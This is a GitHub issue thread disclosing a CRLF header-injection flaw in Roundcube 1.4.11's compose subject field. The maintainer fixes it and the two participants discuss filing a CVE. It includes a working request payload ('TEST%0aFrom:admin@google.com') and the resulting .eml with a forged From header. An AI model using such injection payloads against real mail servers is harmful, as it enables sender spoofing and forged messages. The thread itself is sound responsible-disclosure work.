CRLF injection in subject #8404

apmemka · 2022-01-17T20:22:30Z

Hi,

I wrote you on hello@roundcube.net and dev@lists.roundcube.net but didn't get any response.

Sending new email user can modify eml content with LF (%0a) injection in subject.

Tested in Roundcube 1.4.11

Vulnerable request:

POST /?_task=mail&_unlock=<...>&_framed=1&_lang=ru HTTP/1.1
<...>

_subject=TEST%0aFrom:admin@google.com%0aDate:1&<....>

.eml file:

MIME-Version: 1.0
Date: Mon, 17 Jan 2022 23:17:29 +0300
From: s02<...>ru
To: <...>
Subject: TEST
From:admin@google.com
Date:1
User-Agent: Roundcube Webmail/1.4.11
Message-ID: <7af972d<..>c76ecc85f3@<..>.ru>
X-Sender: s02<...>ru

The text was updated successfully, but these errors were encountered:

alecpl · 2022-01-22T07:29:18Z

Fixed.

apmemka · 2022-01-24T13:46:24Z

@alecpl Thanks!

What's about CVE?
Do you register it yourselves or I should write to MITRE?

alecpl · 2022-01-24T14:00:04Z

Please, do it. I have no time and good experience with contacting MITRE.

alecpl added bug C: Mail composing labels Jan 22, 2022

alecpl added this to the 1.6-beta milestone Jan 22, 2022

alecpl added a commit that referenced this issue Jan 22, 2022

Fix mail headers injection via the subject field on mail compose (#8404)

ab91416

alecpl added a commit that referenced this issue Jan 22, 2022

Fix mail headers injection via the subject field on mail compose (#8404)

6d5c41e

alecpl closed this as completed Jan 22, 2022

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

CRLF injection in subject #8404

CRLF injection in subject #8404

apmemka commented Jan 17, 2022 •

edited

alecpl commented Jan 22, 2022

apmemka commented Jan 24, 2022

alecpl commented Jan 24, 2022

CRLF injection in subject #8404

CRLF injection in subject #8404

Comments

apmemka commented Jan 17, 2022 • edited

alecpl commented Jan 22, 2022

apmemka commented Jan 24, 2022

alecpl commented Jan 24, 2022

apmemka commented Jan 17, 2022 •

edited